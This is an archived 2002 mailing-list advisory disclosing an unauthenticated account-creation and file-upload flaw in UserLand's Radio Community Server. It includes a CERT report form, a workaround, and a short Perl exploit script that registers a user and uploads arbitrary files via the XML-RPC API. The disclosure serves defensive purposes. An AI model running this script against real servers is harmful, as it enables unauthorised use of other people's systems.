RCS public file sharing vulnerability

From: Gerhard Poul (gpoul@EUNET.AT)
Date: 07/07/02

Date:         Sun, 7 Jul 2002 17:34:36 +0200
From: Gerhard Poul <gpoul@EUNET.AT>


This is a vulnerability Andreas and I found about eight weeks ago. This
was then first reported to the vendor and CERT. CERT received it on
5/10/02 at 8:01pm. They haven't yet done anything with it as far as I
can tell. - I haven't received anything from them except for the
automated responses.

I've attached the same description here that I also sent to CERT.
Best regards,
Gerhard Poul


 Name : Gerhard Poul, Andreas Bolka
 E-mail : gpoul at eunet.at, andreas.bolka at gmx.net
 Phone / fax : [removed]
 Affiliation and address:

Have you reported this to the vendor? [yes/no] yes.

        If so, please let us know whom you've contacted:

        Date of your report : 5/9/02
        Vendor contact name : Dave Winer
        Vendor contact phone :
        Vendor contact e-mail : dave@userland.com
        Vendor reference number :


        ___ Do not release my identity to your vendor contact.

If there is a CERT Vulnerability tracking number please put it here
(otherwise leave blank): VU#______.

Please describe the vulnerability.

This vulnerability makes it possible for an intruder to use the open
SOAP or XML-RPC APIs published at
http://www.soapware.org/xmlStorageSystem to create user accounts and
upload random file data to any server running the Radio Community Server
as published by UserLand Software Inc. at http://rcs.userland.com

What is the impact of this vulnerability?

   a) What is the specific impact:

Intruders can publish public files on a server without any special user
permission over a network. - You don't need a user account or anything
else on the target machine to make this work.

   b) How would you envision it being used in an attack scenario:

This vulnerability enables attackers to publicly post files on any
machine running the vulnerable software package.

To your knowledge is the vulnerability currently being exploited?
        [yes/no] no.

If there is an exploitation script available, please include it here.


use Frontier::Client;
use MIME::Base64 qw(encode_base64);

local($/) = undef; # slurp
$email = "John@test.com";
$name = "John Doe";
$password = "whateveryouwant.com";
$filename = $ARGV[0];

$server = Frontier::Client->new( 'url' => 'http://radiohost/RPC2',
                                 'debug' => 0 );
$file = $server->base64(encode_base64(<>));
$result = $server->call("xmlStorageSystem.registerUser", $email, $name,
$password, 81, 0, 0); $usernum = $result->{'usernum'}; $result =
$server->call("xmlStorageSystem.saveMultipleFiles", $usernum,
                        $password, [ $filename ], [ $file ]); $filename
= $result->{'urlList'}->[0]; print "New user with ID $usernum has been
created\n"; print "File has been uploaded to URI: $filename\n";

Do you know what systems and/or configurations are vulnerable?
        [yes/no] no.

        System :
        OS version :

Are you aware of any workarounds and/or fixes for this vulnerability?
        [yes/no] yes.

There is a setting in the RCS software that restricts remote new user
registrations. - By turning these remote registrations off, which are on
by default, you can work around this problem but it will also restrict
the usefulness of the community server.


This vulnerability is an inherent design flaw of the xmlStorageSystem
XML-RPC or SOAP interface used between a Radio Client and a Radio
Community Server. - It has to be fixed in the specification first to
design a secure solution and every customer should be advised to
shutdown their Radio Community Servers immediately.

The vendor has been contacted but does not agree with our vulnerability

Relevant Pages